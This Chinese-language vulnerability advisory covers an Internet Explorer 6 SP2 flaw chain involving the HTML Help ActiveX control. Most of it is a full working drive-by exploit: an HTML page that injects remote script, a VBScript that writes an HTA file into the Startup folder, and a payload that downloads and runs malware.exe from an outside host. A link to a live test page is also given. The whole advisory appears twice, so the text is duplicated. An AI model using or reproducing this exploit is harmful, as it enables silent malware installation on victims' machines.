受影响系统:
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题,远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶意代码执行。
攻击者可以按照如下方法实现:
1. 建立一个包含如下代码的WEB页:
sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to \
ols.htm"> </OBJECT>
<OBJECT id="inject" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script \
language=\\\"vbscript\\\" \
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode \
(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'> </OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------
第一个对象(id: localpage)告诉hhctrl.ocx打开一个帮助弹出窗口到C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm位置,选择这个文件是因为它以本地域处理。在部分电脑上在弹出前会显示错误,这是用户唯一的机会防止此漏洞工作。
第二个对象(id: inject)告诉帮助弹出窗口操纵javascript协议,执行跨站脚本,脚本标签使用远程文件写此页,并且writehta.txt在不安全本地域中执行。
在这个脚本中,HHClick是用于自动化此漏洞。
2. Writehta.txt使用adodb recordset写Microsoft Office.hta 到用户启动文件夹中:
writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft \
Office.hta", adPersistXML rs.close
conn.close
window.close
---------------------------------------------------------------------
3. f00bar.txt是由adodb recordset请求文件,由于没有对hta文件做绝对限制,因此可通过请求和保存文件到用户系统上来入侵目标用户:
f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : \
crap=""" """ : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------
测试方法:
http://freehost07.websamba.com/greyhats/sp2rc.htm
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
Microsoft Internet Explorer 6.0SP2描述:
- Microsoft Windows XP Professional SP2
- Microsoft Windows XP Home SP2
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题,远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶意代码执行。
攻击者可以按照如下方法实现:
1. 建立一个包含如下代码的WEB页:
sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to \
ols.htm"> </OBJECT>
<OBJECT id="inject" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script \
language=\\\"vbscript\\\" \
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode \
(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'> </OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------
第一个对象(id: localpage)告诉hhctrl.ocx打开一个帮助弹出窗口到C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm位置,选择这个文件是因为它以本地域处理。在部分电脑上在弹出前会显示错误,这是用户唯一的机会防止此漏洞工作。
第二个对象(id: inject)告诉帮助弹出窗口操纵javascript协议,执行跨站脚本,脚本标签使用远程文件写此页,并且writehta.txt在不安全本地域中执行。
在这个脚本中,HHClick是用于自动化此漏洞。
2. Writehta.txt使用adodb recordset写Microsoft Office.hta 到用户启动文件夹中:
writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft \
Office.hta", adPersistXML rs.close
conn.close
window.close
---------------------------------------------------------------------
3. f00bar.txt是由adodb recordset请求文件,由于没有对hta文件做绝对限制,因此可通过请求和保存文件到用户系统上来入侵目标用户:
f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : \
crap=""" """ : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://freehost07.websamba.com/greyhats/sp2rc.htm
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
